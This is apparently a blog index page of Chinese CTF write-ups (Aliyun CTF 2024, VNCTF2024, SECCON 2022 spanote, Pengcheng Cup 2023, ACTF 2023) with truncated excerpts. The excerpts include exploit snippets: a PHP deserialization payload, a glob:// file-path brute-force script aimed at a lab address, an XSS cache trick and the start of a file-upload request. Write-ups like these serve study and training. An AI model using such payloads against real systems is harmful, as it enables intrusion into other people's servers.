📝 2024 📝
靜下心來尋找值得交付的熱愛
阿里云 CTF 2024 chain17
codeql yyds
beanFactory.getBean
兴致来了的安研(
VNCTF2024 Writeup
幸而天佑,竟获魁首
CVE-2024-2016
CVE-2024-2016 这个编号还挺好看的.jpg
SECCON 2022 spanote
看了一天,遇到好多问题,现在都把问题理清楚了
于是有了一份自己的 exp
如下
[SECCON 2022]spanote利用浏览器缓存
此处存在 xss,虽然是 GET,但是会检查自定义的 header,直接使用浏览器访问是 x 不到的
12345678fastify.get("/api/notes/:noteId", async (request, reply) => { const user = new User(request.session.userId); if (request.headers["x-token"] !== hash(user.id)) { throw new Error("Invalid token"); } const noteId = validate(request.params.noteId); return user.sendNote(reply, noteId);});
但是搭配剛剛講到的 cache 行為,你可以:
用 ...
鹏城杯 2023 初赛 Web Writeup
去年的鹏城杯,鄙人只做出来 1 题今年的鹏城杯,鄙人和队友一起做出来了 5/6 题
web1好简单的反序列化
12345$hacker = new Hacker();$h = new H();$h->username = $hacker;echo urlencode(serialize($h));
web2glob 协议爆破文件路径
123456789101112131415import stringimport requestsburp0_url = "http://172.10.0.5:80/"dic = string.digits + string.ascii_lowercaseres = ""for length in range(40): for i in dic: burp0_data = {"filename": "glob://./backdoor_" + res + i + "*"} r = req ...
ACTF 2023 Web Writeup
ak 的队伍不少,意味着 Web 方向的题目中规中矩
craftcms感觉是网站根目录没有写权限导致的,换一个目录写,然后文件包含
1234567891011121314151617181920212223242526272829303132POST http://61.147.171.105:50610/ HTTP/1.1Host: 61.147.171.105:49757User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 767Content-Type: multipart/form-data; boundary=40226d1ab58079c727ec470ae0983832--40226d1ab58079c727ec470ae098 ...